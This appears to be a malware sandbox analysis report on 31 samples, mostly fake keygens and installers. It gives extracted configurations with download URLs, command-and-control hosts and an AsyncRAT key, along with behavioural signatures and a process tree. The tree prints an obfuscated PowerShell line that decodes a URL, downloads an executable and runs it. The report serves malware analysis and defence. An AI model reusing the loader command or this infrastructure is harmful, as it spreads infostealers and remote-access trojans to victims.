Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
1805s -
max time network
1820s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 10:08
Static task
static1
Behavioral task
behavioral1
Sample
1.bin/1.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral6
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral8
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
SecurityTaskManager_Setup.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
amtemu.v0.9.2.win-painter_edited.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral26
Sample
default.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral28
Sample
good.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
infected dot net installer.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
oof.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
ou55sg33s_1.exe
Resource
win10v20201028
General
Malware Config
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
raccoon
5e4db353b88c002ba6466c06437973619aad03b3
-
url4cnc
https://telete.in/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Extracted
remcos
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral12/memory/2180-250-0x000000000040616E-mapping.dmp disable_win_def behavioral12/memory/2180-249-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral12/memory/4872-272-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral12/memory/4872-273-0x0000000000403BEE-mapping.dmp disable_win_def behavioral12/files/0x000300000001abb3-297.dat disable_win_def behavioral12/files/0x000300000001abb3-296.dat disable_win_def behavioral12/memory/3976-670-0x000000000040616E-mapping.dmp disable_win_def behavioral12/memory/5476-696-0x0000000000403BEE-mapping.dmp disable_win_def behavioral12/files/0x000400000001abcd-781.dat disable_win_def behavioral12/files/0x000400000001abcd-780.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload 3 IoCs
resource yara_rule behavioral12/memory/4972-236-0x000000000040C76E-mapping.dmp asyncrat behavioral12/memory/4972-233-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral12/memory/5832-650-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage 2 IoCs
resource yara_rule behavioral12/memory/4724-302-0x00000000041C0000-0x000000000421C000-memory.dmp modiloader_stage1 behavioral12/memory/5668-674-0x0000000002A80000-0x0000000002ADC000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request 6 IoCs
flow pid Process 10 2224 powershell.exe 12 1752 powershell.exe 15 2224 powershell.exe 16 1752 powershell.exe 18 4536 powershell.exe 20 4536 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
pid Process 2600 Keygen.exe 5072 omx.exe 4132 xvb.exe 2528 FGbfttrev.exe 476 FDvbcgfert.exe 4440 omx.exe 3884 FGbfttrev.exe 2440 FDvbcgfert.exe 4824 ywq.exe 5080 FGbfttrev.exe 5052 FGbfttrev.exe 4244 WbzfV6CULA.exe 4724 ys0nsVDvlk.exe 5044 k7OXQaTnHC.exe 4848 r9bcktZEdK.exe 4412 azchgftrq.exe 4972 WbzfV6CULA.exe 4204 xvb.exe 2180 k7OXQaTnHC.exe 4808 r9bcktZEdK.exe 4872 r9bcktZEdK.exe 1872 mmfwhmpi.exe 5372 ozchgftrq.exe 3736 azchgftrq.exe 6116 owIRnLSEZY.exe 5668 tr1M5TzQok.exe 2616 ZipHA1oS1L.exe 5496 viu1oJ97BK.exe 5832 owIRnLSEZY.exe 4304 ZipHA1oS1L.exe 3976 ZipHA1oS1L.exe 4160 viu1oJ97BK.exe 1028 ozchgftrq.exe 5476 viu1oJ97BK.exe 4836 ipjk2yso.exe -
Loads dropped DLL 13 IoCs
pid Process 2440 FDvbcgfert.exe 2440 FDvbcgfert.exe 2440 FDvbcgfert.exe 4440 omx.exe 4440 omx.exe 4440 omx.exe 4440 omx.exe 4440 omx.exe 4440 omx.exe 4204 xvb.exe 1028 ozchgftrq.exe 1028 ozchgftrq.exe 1028 ozchgftrq.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features r9bcktZEdK.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" r9bcktZEdK.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" viu1oJ97BK.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url" ys0nsVDvlk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini omx.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini xvb.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4440 omx.exe 4440 omx.exe 3884 FGbfttrev.exe 3884 FGbfttrev.exe 2440 FDvbcgfert.exe 2440 FDvbcgfert.exe 5052 FGbfttrev.exe 5052 FGbfttrev.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 5072 set thread context of 4440 5072 omx.exe 104 PID 2528 set thread context of 3884 2528 FGbfttrev.exe 105 PID 476 set thread context of 2440 476 FDvbcgfert.exe 106 PID 5080 set thread context of 5052 5080 FGbfttrev.exe 109 PID 4244 set thread context of 4972 4244 WbzfV6CULA.exe 125 PID 4132 set thread context of 4204 4132 xvb.exe 126 PID 5044 set thread context of 2180 5044 k7OXQaTnHC.exe 127 PID 4848 set thread context of 4872 4848 r9bcktZEdK.exe 131 PID 4412 set thread context of 3736 4412 azchgftrq.exe 168 PID 6116 set thread context of 5832 6116 owIRnLSEZY.exe 177 PID 2616 set thread context of 3976 2616 ZipHA1oS1L.exe 179 PID 5372 set thread context of 1028 5372 ozchgftrq.exe 180 PID 5496 set thread context of 5476 5496 viu1oJ97BK.exe 183 PID 5668 set thread context of 2536 5668 tr1M5TzQok.exe 198 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ozchgftrq.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 4948 timeout.exe 4264 timeout.exe 2012 timeout.exe 2468 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4188 taskkill.exe 4344 taskkill.exe 5012 taskkill.exe 5440 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4320 reg.exe 1872 reg.exe 2168 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ys0nsVDvlk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ys0nsVDvlk.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3612 powershell.exe 2224 powershell.exe 1752 powershell.exe 4104 powershell.exe 2224 powershell.exe 3612 powershell.exe 3612 powershell.exe 1752 powershell.exe 4104 powershell.exe 3612 powershell.exe 2224 powershell.exe 1752 powershell.exe 1752 powershell.exe 4104 powershell.exe 4104 powershell.exe 4536 powershell.exe 4536 powershell.exe 4736 powershell.exe 4736 powershell.exe 4536 powershell.exe 4736 powershell.exe 4536 powershell.exe 4736 powershell.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 5072 omx.exe 2528 FGbfttrev.exe 476 FDvbcgfert.exe 5080 FGbfttrev.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeDebugPrivilege 4536 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 4188 taskkill.exe Token: SeDebugPrivilege 4132 xvb.exe Token: SeDebugPrivilege 4244 WbzfV6CULA.exe Token: SeDebugPrivilege 5044 k7OXQaTnHC.exe Token: SeDebugPrivilege 2180 k7OXQaTnHC.exe Token: SeDebugPrivilege 4848 r9bcktZEdK.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 4344 taskkill.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeIncreaseQuotaPrivilege 4252 powershell.exe Token: SeSecurityPrivilege 4252 powershell.exe Token: SeTakeOwnershipPrivilege 4252 powershell.exe Token: SeLoadDriverPrivilege 4252 powershell.exe Token: SeSystemProfilePrivilege 4252 powershell.exe Token: SeSystemtimePrivilege 4252 powershell.exe Token: SeProfSingleProcessPrivilege 4252 powershell.exe Token: SeIncBasePriorityPrivilege 4252 powershell.exe Token: SeCreatePagefilePrivilege 4252 powershell.exe Token: SeBackupPrivilege 4252 powershell.exe Token: SeRestorePrivilege 4252 powershell.exe Token: SeShutdownPrivilege 4252 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeSystemEnvironmentPrivilege 4252 powershell.exe Token: SeRemoteShutdownPrivilege 4252 powershell.exe Token: SeUndockPrivilege 4252 powershell.exe Token: SeManageVolumePrivilege 4252 powershell.exe Token: 33 4252 powershell.exe Token: 34 4252 powershell.exe Token: 35 4252 powershell.exe Token: 36 4252 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 4220 powershell.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeIncreaseQuotaPrivilege 5056 powershell.exe Token: SeSecurityPrivilege 5056 powershell.exe Token: SeTakeOwnershipPrivilege 5056 powershell.exe Token: SeLoadDriverPrivilege 5056 powershell.exe Token: SeSystemProfilePrivilege 5056 powershell.exe Token: SeSystemtimePrivilege 5056 powershell.exe Token: SeProfSingleProcessPrivilege 5056 powershell.exe Token: SeIncBasePriorityPrivilege 5056 powershell.exe Token: SeCreatePagefilePrivilege 5056 powershell.exe Token: SeBackupPrivilege 5056 powershell.exe Token: SeRestorePrivilege 5056 powershell.exe Token: SeShutdownPrivilege 5056 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeSystemEnvironmentPrivilege 5056 powershell.exe Token: SeRemoteShutdownPrivilege 5056 powershell.exe Token: SeUndockPrivilege 5056 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2600 Keygen.exe 5072 omx.exe 2528 FGbfttrev.exe 476 FDvbcgfert.exe 4824 ywq.exe 5080 FGbfttrev.exe 2180 k7OXQaTnHC.exe 2180 k7OXQaTnHC.exe 3976 ZipHA1oS1L.exe 3976 ZipHA1oS1L.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1096 wrote to memory of 2856 1096 Keygen.exe 76 PID 1096 wrote to memory of 2856 1096 Keygen.exe 76 PID 1096 wrote to memory of 2856 1096 Keygen.exe 76 PID 2856 wrote to memory of 2600 2856 cmd.exe 79 PID 2856 wrote to memory of 2600 2856 cmd.exe 79 PID 2856 wrote to memory of 2600 2856 cmd.exe 79 PID 2856 wrote to memory of 3180 2856 cmd.exe 80 PID 2856 wrote to memory of 3180 2856 cmd.exe 80 PID 2856 wrote to memory of 3180 2856 cmd.exe 80 PID 2856 wrote to memory of 2644 2856 cmd.exe 81 PID 2856 wrote to memory of 2644 2856 cmd.exe 81 PID 2856 wrote to memory of 2644 2856 cmd.exe 81 PID 2856 wrote to memory of 2012 2856 cmd.exe 82 PID 2856 wrote to memory of 2012 2856 cmd.exe 82 PID 2856 wrote to memory of 2012 2856 cmd.exe 82 PID 3180 wrote to memory of 2224 3180 mshta.exe 83 PID 3180 wrote to memory of 2224 3180 mshta.exe 83 PID 3180 wrote to memory of 2224 3180 mshta.exe 83 PID 2644 wrote to memory of 3612 2644 mshta.exe 84 PID 2644 wrote to memory of 3612 2644 mshta.exe 84 PID 2644 wrote to memory of 3612 2644 mshta.exe 84 PID 2856 wrote to memory of 2544 2856 cmd.exe 87 PID 2856 wrote to memory of 2544 2856 cmd.exe 87 PID 2856 wrote to memory of 2544 2856 cmd.exe 87 PID 2856 wrote to memory of 3960 2856 cmd.exe 88 PID 2856 wrote to memory of 3960 2856 cmd.exe 88 PID 2856 wrote to memory of 3960 2856 cmd.exe 88 PID 2856 wrote to memory of 2468 2856 cmd.exe 89 PID 2856 wrote to memory of 2468 2856 cmd.exe 89 PID 2856 wrote to memory of 2468 2856 cmd.exe 89 PID 2544 wrote to memory of 1752 2544 mshta.exe 90 PID 2544 wrote to memory of 1752 2544 mshta.exe 90 PID 2544 wrote to memory of 1752 2544 mshta.exe 90 PID 3960 wrote to memory of 4104 3960 mshta.exe 92 PID 3960 wrote to memory of 4104 3960 mshta.exe 92 PID 3960 wrote to memory of 4104 3960 mshta.exe 92 PID 2856 wrote to memory of 4464 2856 cmd.exe 94 PID 2856 wrote to memory of 4464 2856 cmd.exe 94 PID 2856 wrote to memory of 4464 2856 cmd.exe 94 PID 4464 wrote to memory of 4536 4464 mshta.exe 95 PID 4464 wrote to memory of 4536 4464 mshta.exe 95 PID 4464 wrote to memory of 4536 4464 mshta.exe 95 PID 2856 wrote to memory of 4620 2856 cmd.exe 97 PID 2856 wrote to memory of 4620 2856 cmd.exe 97 PID 2856 wrote to memory of 4620 2856 cmd.exe 97 PID 4620 wrote to memory of 4736 4620 mshta.exe 98 PID 4620 wrote to memory of 4736 4620 mshta.exe 98 PID 4620 wrote to memory of 4736 4620 mshta.exe 98 PID 2224 wrote to memory of 5072 2224 powershell.exe 100 PID 2224 wrote to memory of 5072 2224 powershell.exe 100 PID 2224 wrote to memory of 5072 2224 powershell.exe 100 PID 1752 wrote to memory of 4132 1752 powershell.exe 101 PID 1752 wrote to memory of 4132 1752 powershell.exe 101 PID 1752 wrote to memory of 4132 1752 powershell.exe 101 PID 5072 wrote to memory of 2528 5072 omx.exe 102 PID 5072 wrote to memory of 2528 5072 omx.exe 102 PID 5072 wrote to memory of 2528 5072 omx.exe 102 PID 5072 wrote to memory of 476 5072 omx.exe 103 PID 5072 wrote to memory of 476 5072 omx.exe 103 PID 5072 wrote to memory of 476 5072 omx.exe 103 PID 5072 wrote to memory of 4440 5072 omx.exe 104 PID 5072 wrote to memory of 4440 5072 omx.exe 104 PID 5072 wrote to memory of 4440 5072 omx.exe 104 PID 5072 wrote to memory of 4440 5072 omx.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8487.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\8487.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2600
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Users\Public\omx.exe"C:\Users\Public\omx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:476 -
